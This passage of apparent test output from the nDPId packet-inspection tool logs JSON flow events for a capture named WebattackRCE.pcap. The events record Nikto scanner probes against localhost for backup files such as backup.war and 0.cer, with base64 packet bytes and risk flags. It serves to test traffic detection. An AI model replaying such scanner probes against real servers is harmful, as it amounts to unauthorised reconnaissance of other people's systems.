(Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277087,"pkt":"AAAAAAAAAAAAAAAACABFAADFByZAAEAGNQt\/AAABfwAAAcOiH5Ca4D9dxFiRCIAYAED+uQAAAQEICp1m\/IedZvyHR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":269,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277087,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":1,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277089,"pkt":"AAAAAAAAAAAAAAAACABFAADFHRdAAEAGHxp\/AAABfwAAAcOkH5BFAiVuc2g7y4AYAED+uQAAAQEICp1m\/ImdZvyJR0VUIC8xMjdfMF8wXzEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":270,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277089,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277090,"pkt":"AAAAAAAAAAAAAAAACABFAADCB4tAAEAGNKl\/AAABfwAAAcOmH5BcnD\/ywDswlIAYAED+tgAAAQEICp1m\/IqdZvyKR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277090,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277091,"pkt":"AAAAAAAAAAAAAAAACABFAADCHJtAAEAGH5l\/AAABfwAAAcOoH5BLfyTh3iqQcIAYAED+tgAAAQEICp1m\/IudZvyLR0VUIC9iYWNrdXAud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":272,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277091,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277093,"pkt":"AAAAAAAAAAAAAAAACABFAADCo9lAAEAGmFp\/AAABfwAAAcOqH5B0iJuvJFRwg4AYAED+tgAAAQEICp1m\/IydZvyMR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277093,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":1,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277094,"pkt":"AAAAAAAAAAAAAAAACABFAADCBM1AAEAGN2d\/AAABfwAAAcOsH5CyHDyzBNbaOYAYAED+tgAAAQEICp1m\/I6dZvyOR0VUIC9iYWNrdXAuZWdnIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277094,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277096,"pkt":"AAAAAAAAAAAAAAAACABFAADCcsRAAEAGyW9\/AAABfwAAAcOuH5Drmkq5YpvrhoAYAED+tgAAAQEICp1m\/JCdZvyQR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":275,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277096,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277098,"pkt":"AAAAAAAAAAAAAAAACABFAADCRRhAAEAG9xt\/AAABfwAAAcOwH5DRhn1t\/ojAOIAYAED+tgAAAQEICp1m\/JGdZvyRR0VUIC8xMjcwMDEuY2VyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":276,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277098,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277100,"pkt":"AAAAAAAAAAAAAAAACABFAAC931JAAEAGXOZ\/AAABfwAAAcOyH5BYxOcsixzBAIAYAED+sQAAAQEICp1m\/JSdZvyUR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":277,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277100,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277106,"pkt":"AAAAAAAAAAAAAAAACABFAAC9aFtAAEAG091\/AAABfwAAAcO0H5ATAFAmoohjQYAYAED+sQAAAQEICp1m\/JqdZvyaR0VUIC8wLmNlciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277106,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277109,"pkt":"AAAAAAAAAAAAAAAACABFAADFvlhAAEAGfdh\/AAABfwAAAcO2H5BO24YshrKR94AYAED+uQAAAQEICp1m\/J2dZvydR0VUIC8xMjcuMC4wLjEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277109,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
